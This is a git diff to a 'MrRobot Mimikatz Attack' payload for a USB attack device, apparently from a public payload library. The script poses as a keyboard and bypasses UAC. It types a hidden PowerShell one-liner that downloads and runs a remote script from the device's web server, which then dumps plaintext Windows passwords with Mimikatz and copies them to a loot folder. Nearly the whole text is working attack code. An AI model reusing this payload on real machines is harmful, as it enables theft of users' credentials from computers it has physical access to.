diff --git a/payloads/library/credentials/MrRobot/payload.txt b/payloads/library/credentials/MrRobot/payload.txt index 6cb6b425..4b4e398a 100644 --- a/payloads/library/credentials/MrRobot/payload.txt +++ b/payloads/library/credentials/MrRobot/payload.txt @@ -1,53 +1,48 @@ #!/bin/bash # # Title: MrRobot Mimikatz Attack -# Author: illwill +# Author: illwill, El3ct71k # Version: 0.2 # # Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory # with Mimikatz then stashes them in /root/udisk/loot/MrRobot # -# Blue...............Running Powershell / Waiting for WebServer to start -# White..............WebServer started and Uploading Results -# Purple.............Checking for Results +# Purple......................Setup +# Yellow single blink.........Running Powershell / Waiting for WebServer to start +# Yellow double blink.........Waiting for server connection and uploading results +# Cyan inverted single blink..Starts ethenet attack +# Cyan inverted double blink..Starts server to gets results # Green..............Got Creds and copied to loot folder -# Amber(Blinking)....Mimikatz Error (Not Admin?) # Red................No Creds - -source bunny_helpers.sh - -LED R G 200 +LED SETUP # Creating Loot Folders LOOTDIR=/root/udisk/loot/MrRobot mkdir -p $LOOTDIR SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION mkdir -p $SWITCHDIR/loot -LED B 200 # HID Attack Starts ATTACKMODE HID - +DUCKY_LANG us # UAC Bypass -Q GUI r -Q STRING powershell -c "Start-Process cmd -verb runas" +LED STAGE1 +RUN WIN powershell -c "Start-Process cmd -verb runas" +Q DELAY 250 Q ENTER -Q DELAY 1000 +Q DELAY 1500 Q LEFTARROW Q DELAY 500 Q ENTER Q DELAY 1500 +LED STAGE2 #Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\"" Q DELAY 300 Q ENTER - - # Ethernet Attack Starts ATTACKMODE RNDIS_ETHERNET -source bunny_helpers.sh - -LED R G B 200 +LED SPECIAL1 # mount -o sync /dev/nandf /root/udisk iptables -A OUTPUT -p udp --dport 53 -j DROP @@ -55,22 +50,22 @@ python $SWITCHDIR/server.py #Wait for EOF in loot folder -LED R B 200 +LED SPECIAL2 while [ ! -e "$SWITCHDIR/loot/EOF" ]; do sleep 1; done; sleep 1 -# check for empty loot directory, then check results and move them to loot +# check for empty lootddd directory, then check results and move them to loot if [ "$(ls -A $SWITCHDIR/loot/)" ]; then if grep -q "ERROR kuhl_m_sekurlsa_acquireLSA" $SWITCHDIR/loot/*.txt; then - LED G R 200 + LED FAIL mv -v $SWITCHDIR/loot/*.txt $LOOTDIR rm -rf $SWITCHDIR/loot/ else mv -v $SWITCHDIR/loot/*.txt $LOOTDIR rm -rf $SWITCHDIR/loot/ - LED G + LED FINISH fi else - rm-rf $SWITCHDIR/loot/ - LED R + rm -rf $SWITCHDIR/loot/ + LED FAIL fi